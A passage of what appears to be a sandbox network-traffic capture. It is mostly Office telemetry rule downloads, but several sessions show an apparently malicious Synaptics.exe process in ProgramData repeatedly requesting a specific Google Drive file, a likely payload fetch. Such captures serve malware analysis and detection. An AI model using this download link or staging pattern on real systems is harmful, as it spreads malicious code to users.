                                                                                        x-azure-ref: 20241205T215036Z-1746fd949bdfg4slhC1EWR34t0000000036000000000a881
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:37 UTC | 404 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        63 | 192.168.2.5 | 49832 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:36 UTC | 192 | OUT | GET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:37 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:37 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 468
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                        ETag: "0x8DC582BB046B576"
                                                                                        x-ms-request-id: 4ebe80de-801e-0047-51c8-457265000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215037Z-1746fd949bdqpttnhC1EWRe1wg000000032g0000000088af
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:37 UTC | 468 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        64 | 192.168.2.5 | 49834 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:37 UTC | 192 | OUT | GET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:38 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:37 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 479
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                        ETag: "0x8DC582BB7D702D0"
                                                                                        x-ms-request-id: 884a34ff-001e-00a2-15a2-46d4d5000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215037Z-1746fd949bdjzh7thC1EWR3g6400000003c0000000008xxa
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:38 UTC | 479 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        65 | 192.168.2.5 | 49840 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:38 UTC | 192 | OUT | GET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:38 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:38 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 425
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                        ETag: "0x8DC582BBA25094F"
                                                                                        x-ms-request-id: 5f5d2afa-901e-0015-66cc-45b284000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215038Z-1746fd949bdnq7x2hC1EWRpxr0000000036g000000004bh7
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:38 UTC | 425 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        66 | 192.168.2.5 | 49841 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:38 UTC | 192 | OUT | GET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:39 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:38 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 475
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                        ETag: "0x8DC582BB2BE84FD"
                                                                                        x-ms-request-id: 935017b2-001e-0017-80c6-450c3c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215038Z-1746fd949bdmv56chC1EWRypnn00000003eg00000000cku0
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:39 UTC | 475 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        67 | 192.168.2.5 | 49843 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:38 UTC | 192 | OUT | GET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:39 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:39 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 491
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                        ETag: "0x8DC582B98B88612"
                                                                                        x-ms-request-id: 17f2aa49-701e-005c-61a3-46bb94000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215039Z-1746fd949bddgsvjhC1EWRum2c00000003gg00000000p81x
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:39 UTC | 491 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        68 | 192.168.2.5 | 49842 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:38 UTC | 192 | OUT | GET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:39 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:39 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 448
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                        ETag: "0x8DC582BB389F49B"
                                                                                        x-ms-request-id: 6baa9d1a-801e-0048-02ce-45f3fb000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215039Z-1746fd949bdjzh7thC1EWR3g6400000003a000000000hpne
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:39 UTC | 448 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        69 | 192.168.2.5 | 49844 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:39 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:39 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-1VEgma0PmTbDz1B1YwTdfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        70 | 192.168.2.5 | 49845 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:39 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:39 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-D9gurwwALbIEpkQMKKQuSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        71 | 192.168.2.5 | 49847 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:39 UTC | 192 | OUT | GET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:40 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:40 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 416
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                        ETag: "0x8DC582BAEA4B445"
                                                                                        x-ms-request-id: 0e2e5981-501e-0035-17c1-45c923000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215040Z-1746fd949bdwt8wrhC1EWRu6rg00000003fg0000000093nt
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:40 UTC | 416 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        72 | 192.168.2.5 | 49850 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:40 UTC | 192 | OUT | GET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:41 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:40 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 479
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                        ETag: "0x8DC582B989EE75B"
                                                                                        x-ms-request-id: c73ff22a-601e-0097-54c1-45f33a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215040Z-1746fd949bd9x4mhhC1EWRb76n000000039g00000000ndm0
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:41 UTC | 479 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        73 | 192.168.2.5 | 49851 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:40 UTC | 192 | OUT | GET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:41 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:41 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 415
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                        x-ms-request-id: 9b021dfd-501e-0047-60c1-45ce6c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215041Z-1746fd949bdxk6n6hC1EWRdr8c000000037g0000000016vn
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:41 UTC | 415 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        74 | 192.168.2.5 | 49852 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:41 UTC | 192 | OUT | GET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:41 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:41 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 471
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                        ETag: "0x8DC582B97E6FCDD"
                                                                                        x-ms-request-id: 4da954f1-f01e-003f-58cd-45d19d000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215041Z-1746fd949bdtlp5chC1EWRq1v400000003a0000000005a0q
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:41 UTC | 471 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        75 | 192.168.2.5 | 49853 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:41 UTC | 192 | OUT | GET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:41 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:41 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                        ETag: "0x8DC582B9C710B28"
                                                                                        x-ms-request-id: 686307fb-901e-0029-3dcc-45274a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215041Z-1746fd949bd2cq7chC1EWRnx9g00000002u000000001060p
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:41 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        76 | 192.168.2.5 | 49859 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:41 UTC | 192 | OUT | GET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:42 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:42 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 477
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                        ETag: "0x8DC582BA54DCC28"
                                                                                        x-ms-request-id: bbae04f8-a01e-0032-80cc-451949000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215042Z-1746fd949bdmv56chC1EWRypnn00000003e000000000ettb
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:42 UTC | 477 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        77 | 192.168.2.5 | 49861 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:42 UTC | 192 | OUT | GET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:43 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:43 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                        ETag: "0x8DC582BB7F164C3"
                                                                                        x-ms-request-id: 71541f9e-801e-0078-2fc7-45bac6000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215043Z-1746fd949bddgsvjhC1EWRum2c00000003p0000000001fd3
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:43 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        78 | 192.168.2.5 | 49863 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:43 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:43 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:43 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-s2oBeVpyEa36MmexDgcXsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        79 | 192.168.2.5 | 49864 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:43 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:43 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:43 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
